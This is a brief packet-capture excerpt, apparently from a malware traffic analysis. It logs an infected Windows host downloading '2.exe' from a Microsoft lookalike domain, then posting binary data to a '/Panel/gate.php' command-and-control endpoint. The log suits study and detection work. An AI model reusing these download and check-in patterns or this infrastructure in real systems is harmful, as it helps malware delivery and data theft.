2016-10-23 00:47:05.000114 IP 192.168.1.102.58710 > 59.188.68.200.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: GET /down/2.exe HTTP/1.1 E..N..@……..f;.D..V.P……eRP…….GET /down/2.exe HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Accept-Encoding: gzip, deflate Host: down.microsoftsup.com Connection: Keep-Alive — E..(..@….]…f;.D..W.P.e\..1..P….^…….. 2016-10-23 00:47:18.618290 IP 192.168.1.102.58711 > 59.188.68.200.80: Flags [P.], seq 0:272, ack 1, win 256, length 272: HTTP: POST /Panel/gate.php HTTP/1.0 E..8..@….L…f;.D..W.P.e\..1..P…R0..POST /Panel/gate.php HTTP/1.0 Host: a.microsoftsup.com Accept: */* Accept-Encoding: identity, *;q=0 Content-Length: 339 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) — E..(..@….W…f;.D..X.P..b….bP…………. 2016-10-23 00:47:20.056174 IP 192.168.1.102.58712 […]